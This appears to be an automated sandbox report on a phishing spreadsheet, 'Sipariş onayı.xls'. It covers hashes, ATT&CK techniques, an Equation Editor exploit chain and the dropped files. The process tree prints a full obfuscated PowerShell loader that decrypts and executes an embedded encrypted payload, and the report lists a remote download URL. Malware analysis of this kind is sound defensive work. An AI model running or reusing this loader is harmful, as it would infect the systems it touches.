57b1e7f094836b89c613e86a12966702169ead968058ac24c738b891bb8fa01e

Analysis

max time kernel
144s
max time network
108s
platform
windows7_x64
resource
win7-20240705-en
resource tags

arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
submitted
09/07/2024, 10:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Sipariş onayı.xls
Size

1.1MB
MD5

94d52f7b132f459b88ba2b9c6ed076cb
SHA1

6970a28538c35aa1c20b32a855e40c85842025d7
SHA256

57b1e7f094836b89c613e86a12966702169ead968058ac24c738b891bb8fa01e
SHA512

c8a18dab02481a7d226d9d3a71b38087e3406e089051995c1be66e49dcb5b715212ab3eb8a36fe7925a32cb79d6baa98ba0ed2cdb8ea5803d5c1e5fe80b8b594
SSDEEP

24576:48q+k+xbyN3g3yBO128OA2BFzfOSr4hBBzcIPuV8rv4zBkS3QHVO:dq+k+yOUJvSSr4N4IzvT+QH

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 4 IoCs

flow	pid	Process
17	288	EQNEDT32.EXE
20	2176	WScript.exe
22	2176	WScript.exe
24	2232	powershell.exe

Abuses OpenXML format to download file from external location 2 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\Office\Common\Offline\Files\http://woi.gg/poqZbi	WINWORD.EXE
Key opened	\REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\Office\14.0\Common	EXCEL.EXE

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2232	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Launches Equation Editor 1 TTPs 1 IoCs

Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

exploit

Exploitation for Client Execution

T1203

pid	Process
288	EQNEDT32.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1432	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2232	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2232	powershell.exe
Token: SeShutdownPrivilege	2780	WINWORD.EXE

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
1432	EXCEL.EXE
1432	EXCEL.EXE
1432	EXCEL.EXE
2780	WINWORD.EXE
2780	WINWORD.EXE

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 288 wrote to memory of 2176	288	EQNEDT32.EXE	33
PID 288 wrote to memory of 2176	288	EQNEDT32.EXE	33
PID 288 wrote to memory of 2176	288	EQNEDT32.EXE	33
PID 288 wrote to memory of 2176	288	EQNEDT32.EXE	33
PID 2780 wrote to memory of 2152	2780	WINWORD.EXE	34
PID 2780 wrote to memory of 2152	2780	WINWORD.EXE	34
PID 2780 wrote to memory of 2152	2780	WINWORD.EXE	34
PID 2780 wrote to memory of 2152	2780	WINWORD.EXE	34
PID 2176 wrote to memory of 2232	2176	WScript.exe	35
PID 2176 wrote to memory of 2232	2176	WScript.exe	35
PID 2176 wrote to memory of 2232	2176	WScript.exe	35
PID 2176 wrote to memory of 2232	2176	WScript.exe	35

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Sipariş onayı.xls"
1⤵
- Abuses OpenXML format to download file from external location
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1432

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" -Embedding
1⤵
- Abuses OpenXML format to download file from external location
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2780
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:2152

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:288
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\rosepetelgoodfordress.vBS"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of WriteProcessMemory
  PID:2176
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI30773578260699216772112657705967CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIQMf5B09cdBHkAi+7WX6Eim/0LQN2CVUEEynQsRZwEf+oX3ImFjPvUS61KgKvxRvbqbvV1BJjVdgJx56hZgwbiHtWmMltdNLbC+WPfe7eKX4Ft6t2mI6O58+EIo6eppVONGYZ4PiEan5OudS49/sjS50893i6Yhw5C3r48pNAHqUwb7IbeBoa9ry6Qdql8Of+qVQ3cJwZTrOp2UcyAou4IWVlmPqpX3XkMGABgkCfbyMN+Q6W06Kb2qhxKGZ90MI/5Lmo6aUU0pP3cgSwF9QFIo0TcHnGUkN9/Ibu7jDQF+k4GWMheDMEjsTiR25T7uIspS4GY79zjnTGg1D7yTPkE7fbEHYgqmJ14FKcPirsbSHMq4PnuKWeM1w6Os2/YujFcVFMl5JMJhfQ+WCpRTSv9UZ7ZOGhAynbAiDixJoNCrOpzMww6hrpICwpzKJykVqFrMdvgQ+RO/HsA1AZN/v+p9fQ6c6Kvx8xt7qgZmkDe1Jv4iTAlZOFrLQw1MWTYRr0Jj4qCe2CGH6mSTFuM4JfUHEQwLJj7aV7iniYAz070uEF+23PacsLacZN7GdSJGeuPFsxPmRFYw4SrRU/pgOAHdgkVvmsQRuELaz4j9qjzShIHysripsrsnboW4O34sIHJxxSK7BrcnsJ1GVRVAK+3neu/3JkQP3cfEtNUE/bUjkjGwKBZ6SRB3ffkI5dPi1OrATVfV22QLRqztCEoCIN4RQlmeESX1aZ9hhJ20dXXFh6OBPOVejKKEwLndSBIgx43T/RSJuYlpFYYV0nl8P2P0MF4L2UxNfUQ0y7uCAfH8mc1gOKrnVDsqlNBgxWXr/q12k/j7D5cxSl541IT/L6XsiRd3ohNAija/0XPRjiWymjPn9OENUmtc992I2iVIUZ8X93NM+ngBaZe5Nw/AhoaXr5U6DyvuoOvOtRPlYJbyZ7SB7NjxcSpoYbbmqBLRQVYMJilsPwG4Z1GK88B4LpQx/Kqt43EObh8tebhR2PZQsE5tJ/bgMgz6RjuM5alTeJseu4RdgYmQVn9TxzEfUxSANgHJU4vLl2oNtuIPkPtB+RUqwFo+ur+yATstDWzKzm3rl0a2uQyoT8GrMg9LaD+GWvqdFqiz3x9AWLSHqEQ0Qb1a/Ain8Eu3jLPXM6hZ1V7jBdBjJ6tz1CtW6Iz/RDtYcrLFqpIFMwDDJo+MZZoRwFOUPPGfPmHfLpq1XpjMC06L7Vc0vo7xY+oDLcsFDCYkwWCH469PdG2GLSWEXzwy8fvH74rIP8vyTnSRTgz7PU44zK7FRY7qVKW7n7GLCA0H6LbQ+39HckA9WL4uSsUME9GUPdjgLUsEV2jNpd0wTHtsOmB2iy1NE3ypGj5KZqsaSckxBgYX/yHiNgQcsG4mZ6eKpHQ3pA6iGchpeFlY/QveaoGWyqbHZmnQqxSPt0ns/vDUSi3wTAekaWWSJaeZtpxAj7+MK+PzGMr7A+ZRnYCnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
    3⤵
    - Blocklisted process makes network request
    - Drops file in System32 directory
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2232

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Exploitation for Client Execution

T1203

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
1KB

MD5
b5cb610c294a6618c6043081054508f0

SHA1
5751c85ee092b7c30c93b1f1ea2baf890bd99d4a

SHA256
8040a50a5ab1e6859d1ae14b1a9f84cf0fc328a0d9face70ec27ac8e6abe8cef

SHA512
314a5c9e63275ab2d41b445f5b4cf1b9d17c06652c63ce44c0d7a25cc912a836bba7018e7d6efdbd7fb8350337f486cb56f463009cb52cf67fda28507bc2bf87

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
724B

MD5
8202a1cd02e7d69597995cabbe881a12

SHA1
8858d9d934b7aa9330ee73de6c476acf19929ff6

SHA256
58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

SHA512
97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
410B

MD5
645287664cbf1bc468e7d792eeb91e44

SHA1
a9f051d26930077fdc1593b3e9defb4018ab8314

SHA256
5a58ced63147ff319d95e6fb03da5077b737bdc219a6697e15502cc4b908ee87

SHA512
6d74329f303391aaf4a3535aec6b58478eb3fa636df2bbc5a5a15f52884d876414cc2ca63c550ffb9159a5118c5acf4795926d7bee5fbef5ef8af33e961a0d72

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
e3301f0853adeb75c893792da959935b

SHA1
05587c0bbe8a4e388afcf097c65931b263a2fd44

SHA256
2977d3fed2f10eb99576eef6172867663561f9e62516838ab8e3ae0d2d7cb144

SHA512
dfc77656593462ed605c51953a9de4db81916025be517ec53c686c26d209e346a2b623ba1c1f0f1dbcf2852aff06979bb30e2bb3c215669a231b067f040a8e9b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
392B

MD5
6beae66f4c7c60c38ba3cb7650e4f8ed

SHA1
af297fae77232f11ebfc2103caa783170fa66750

SHA256
1964474829f3b1dcf31249e0adb388f8f06f2468d2f825ab239616e336a6eb0d

SHA512
449662dbe1b0ceaabdb7f4036849c2e1411e26e4c969de9d54ee1694038609ef423c853a7a7ec65f8791c40098a5eb58357e1be6d594025585a43d817a2e1a26

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{DA5DC326-69A9-4506-A8A0-5FC5539941CB}.FSD

Filesize
128KB

MD5
54cff9032647ed7e4a770eaa8ed9dc0e

SHA1
ba636fa3895b60ebaf57ed2dc5e0ee803115cfd0

SHA256
c799b5487e951f3836547eaed081cface25c284fe01e7572d4332670b36415f3

SHA512
0a94005aeeb8937f34d617c3ea4e358e6f4c0f9a60e493098877ea7cfe4071c403373ebe38c68d892a67853b829b50e3f2df21d7c3b3dab2fb0e6c27cf8d44a9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

Filesize
128KB

MD5
5b444cbdbc52eb352f3996d84239e829

SHA1
23a41f708656128d84d8215bf9f2a8b4835f6da3

SHA256
1a10e1bdf84928d541d19dfadaf1d7a3132a96f5ec187cef8e3994f2d06d6800

SHA512
1bdaab0c25075427c151cfa56815ee7167ec0e8111eac4a7d9d5a677ad80d4578fd187730f69da5580df2dc597129c1c3de887d98c0f8fb0e36ed53a30dc5d86

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{0E0C29EE-CC79-40E3-90D8-8449C14BFAA7}.FSD

Filesize
128KB

MD5
dac4f1cd0ecfe0f288818907d4e2f319

SHA1
86d37ff9226d6c173fc64b7f9148b876f42d8309

SHA256
e948cd52bb462831e90bb0e7a0665e4bbc7b2498a7de071c51e746f8a67dd9a8

SHA512
5f8bb95e6e8c006ea45f6f2f53b2186ef1f075e8951a9f38e92cec6a161fbe55de0de27d589d89873234a38bc0ec684a6a61e6104a56bf3275bb45f49dd18c55

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GLOK2QLQ\paste1[1].txt

Filesize
156B

MD5
ad6c37ef980373e9bcbd14810fad34bc

SHA1
9c061a1b3608b7c7f1db7cd06c8246913ee11bda

SHA256
ee85057c1a562fc405d03b2b6a651612ac688dff5c9eeae88a0c1e34e17c602c

SHA512
30dc26060efcb4fd44be2d74cc4d33654ee0eb9039bd933c80b67afcc938bdba458cfa6bfc43d2ddb2f59dd6f9ddfe66951c56c61709a2dc02eac94e0e2ae97f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\J8I3CVQY\we.we.we.we.wee[1].doc

Filesize
221KB

MD5
dec81947f9c288a6337b7eb4b8dec580

SHA1
587afe240a9013b8a6fd0d2a574f2ce814fd40b3

SHA256
008c8d4399750dba2733ce354ec97453535e8f00d293368a46c6e5514ebde20f

SHA512
ca82e253009b29a6f2ad7143818c0a4209c56d3bb1aa01f70532a6a1c111399c3acf5b791cb4913fe94430013a0b7b377fb7f4ed65a60d14e60f7fa216006bbc

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabF519.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar1A7.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\{11355A20-CB24-428C-9835-1B787A3A601C}

Filesize
128KB

MD5
fc7a9031da9cf43d5bfca3d9e1fe8004

SHA1
ae1b787bff629f2d41bacf916da123ec7ad1cfea

SHA256
3675add65bd995635aadc302dbafdf1894a981eda03c0b5ade57331c84d2930e

SHA512
6df6b6742dc1eeda62e2dfcda71ab0de265790abf92ac48c39156999233e36d634fe4e51ec28690c6b19ed1c5f6608e416d97fc4863e3b4c18edfd405b5e81d8

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

Filesize
281B

MD5
662f5093d14856818bc3e742feb4235d

SHA1
58d23d8ef269f770e03dafd08ba58d805f3f4c2d

SHA256
92a056bff710e3ee5a7a836d42f470c5c289375cf8a577de83d7854d41c36fc2

SHA512
358a1fd49519846f042d7715604410efa571813795fc73464fc88ea2bc81a18bc91d50890752f7fc11376cd0794f8a7e997288a50bd96ea0a5440c968178056b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\KWPW6DW2.txt

Filesize
819B

MD5
9198d5f29a3e66eab0e4a70204f5b863

SHA1
6427b29a7e71153091fd4826b2e471903556fa6a

SHA256
eee57b4b4543d5b6c0bdc0c8c2487f9db03664dde3c64743553ea09a0dc4c61d

SHA512
074b619b8f981a5309adbb3de8cd460d80a49931469e491158de37985a2f9d0f70231e7614ae2bbd0d58c03e86d7a76864c31d29dba14a1a93446d49e390343e

Download Submit
C:\Users\Admin\AppData\Roaming\rosepetelgoodfordress.vBS

Filesize
149KB

MD5
20765ae510b61f59e546c0b712a00009

SHA1
feccf03d61bbb21c258f772014d75a5bec2b11ad

SHA256
52caa19680e0ec9056836273759dc72e982c8ea03bd48a8c888a6b7acf193a35

SHA512
805753a168b4c1942b8b10b3d06a82df0c308f65c9a5c04504bee9bd1da2d80bef87e2a6ead758ab90873918c944208b6af96583e6dffc1c5c591d57a4fa2cb0

Download Submit
memory/1432-1-0x0000000072B8D000-0x0000000072B98000-memory.dmp

Filesize
44KB

Download
memory/1432-26-0x0000000002450000-0x0000000002452000-memory.dmp

Filesize
8KB

Download
memory/1432-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1432-142-0x0000000072B8D000-0x0000000072B98000-memory.dmp

Filesize
44KB

Download
memory/2780-25-0x0000000003FB0000-0x0000000003FB2000-memory.dmp

Filesize
8KB

Download
memory/2780-23-0x0000000072B8D000-0x0000000072B98000-memory.dmp

Filesize
44KB

Download
memory/2780-21-0x000000002F391000-0x000000002F392000-memory.dmp

Filesize
4KB

Download
memory/2780-143-0x0000000072B8D000-0x0000000072B98000-memory.dmp

Filesize
44KB

Download
memory/2780-157-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2780-158-0x0000000072B8D000-0x0000000072B98000-memory.dmp

Filesize
44KB

Download